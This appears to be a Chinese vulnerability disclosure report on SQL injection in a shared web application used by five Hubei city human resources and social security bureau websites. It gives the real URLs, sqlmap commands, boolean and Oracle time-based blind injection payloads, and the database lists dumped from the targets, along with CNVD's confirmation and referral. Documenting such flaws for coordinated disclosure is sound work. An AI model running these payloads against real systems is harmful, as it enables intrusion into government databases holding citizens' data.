2015-02-25: 细节已通知厂商并且等待厂商处理中 2015-03-02: 厂商已经确认,细节仅向厂商公开 2015-03-12: 细节向核心白帽子及相关领域专家公开 2015-03-22: 细节向普通白帽子公开 2015-04-01: 细节向实习白帽子公开 2015-04-13: 细节向公众公开
闲暇一逛,发现疑似通用型漏洞,第一次提交通用,有点害怕
谷歌搜索关键字,然后自己又添加了几个,目前一共发现5个网站存在这个问题
汉川市人力资源和社会保障局
http://www.hbhc12333.gov.cn/hbwz/qtpage/hdjl/zxzx_ckhf.jsp?zxlb=01
---Place: GETParameter: zxlb Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: zxlb=01%' AND 5239=5239 AND '%'=' Type: AND/OR time-based blind Title: Oracle AND time-based blind Payload: zxlb=01%' AND 9625=DBMS_PIPE.RECEIVE_MESSAGE(CHR(80)||CHR(69)||CHR(79)||CHR(67),5) AND '%'='---web application technology: Servlet 3.0, JSP, JSP 2.2back-end DBMS: Oracle
数据库available databases [21]:[*] CTXSYS[*] DBSNMP[*] DMSYS[*] EXFSYS[*] HBWZ[*] HR[*] IX[*] MDSYS[*] OE[*] OLAPSYS[*] ORDSYS[*] OUTLN[*] PM[*] SCOTT[*] SH[*] SYS[*] SYSMAN[*] SYSTEM[*] TSMSYS[*] WMSYS[*] XDB
石首市人力资源和社会保障局
http://www.ss12333.com/hbwz/qtpage/hdjl/zxzx_ckhf.jsp?zxlb=01
---Place: GETParameter: zxlb Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: zxlb=01%' AND 6505=6505 AND '%'=' Type: AND/OR time-based blind Title: Oracle AND time-based blind Payload: zxlb=01%' AND 9902=DBMS_PIPE.RECEIVE_MESSAGE(CHR(106)||CHR(71)||CHR(87)||CHR(65),5) AND '%'='---web application technology: Servlet 2.5, JSP, JSP 2.1back-end DBMS: Oracle
随州市人力资源和社会保障局
sqlmap -u "http://www.hbsz12333.gov.cn/hbwz/qtpage/hdjl/zxzx_ckhf.jsp" --data "op=88952634&zxlb=02&card=88952634&name=88952634" --dbs
---Place: POSTParameter: zxlb Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: op=88952634&zxlb=02%' AND 9816=9816 AND '%'='&card=88952634&name=88952634 Type: AND/OR time-based blind Title: Oracle OR time-based blind Payload: op=88952634&zxlb=-4497%' OR 9386=DBMS_PIPE.RECEIVE_MESSAGE(CHR(110)||CHR(84)||CHR(84)||CHR(101),5) AND '%'='&card=88952634&name=88952634---web application technology: Servlet 2.4, JSP, JSP 2.0back-end DBMS: Oracle
数据库available databases [16]:[*] CTXSYS[*] DBSNMP[*] DMSYS[*] EXFSYS[*] HBWZ[*] MDSYS[*] OLAPSYS[*] ORDSYS[*] OUTLN[*] SCOTT[*] SYS[*] SYSMAN[*] SYSTEM[*] TSMSYS[*] WMSYS[*] XDB
襄阳市人力资源和社会保障局
sqlmap -u "http://www.xf12333.cn/hbwz/qtpage/hdjl/zxzx_ckhf.jsp" --data "op=88952634&zxlb=02&card=88952634&name=88952634" --dbs
---Place: POSTParameter: zxlb Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: op=88952634&zxlb=02%' AND 7291=7291 AND '%'='&card=88952634&name=88952634 Type: AND/OR time-based blind Title: Oracle AND time-based blind Payload: op=88952634&zxlb=02%' AND 4905=DBMS_PIPE.RECEIVE_MESSAGE(CHR(80)||CHR(84)||CHR(112)||CHR(70),5) AND '%'='&card=88952634&name=88952634---web application technology: Servlet 2.5, JSP, JSP 2.1back-end DBMS: Oracle
数据库:available databases [14]:[*] CTXSYS[*] DBSNMP[*] DMSYS[*] EXFSYS[*] HBWZ[*] MDSYS[*] ORDSYS[*] OUTLN[*] SYS[*] SYSMAN[*] SYSTEM[*] TSMSYS[*] WMSYS[*] XDB
孝感市人力资源和社会保障局
sqlmap -u "http://www.hbxg12333.gov.cn/hbwz/qtpage/hdjl/zxzx_ckhf.jsp" --data "op=88952634&zxlb=02&card=88952634&name=88952634" --dbs
---Place: POSTParameter: zxlb Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: op=88952634&zxlb=02%' AND 9313=9313 AND '%'='&card=88952634&name=88952634 Type: AND/OR time-based blind Title: Oracle AND time-based blind Payload: op=88952634&zxlb=02%' AND 7470=DBMS_PIPE.RECEIVE_MESSAGE(CHR(89)||CHR(80)||CHR(115)||CHR(75),5) AND '%'='&card=88952634&name=88952634---web application technology: Servlet 2.4, JSP, JSP 2.0back-end DBMS: Oracle
已证明,求轻拍!
你们来吧!
危害等级:高
漏洞Rank:20
确认时间:2015-03-02 16:01
CNVD确认并复现所述情况,已经转由CNCERT下发给湖北分中心,由其后续协调网站管理单位处置。
暂无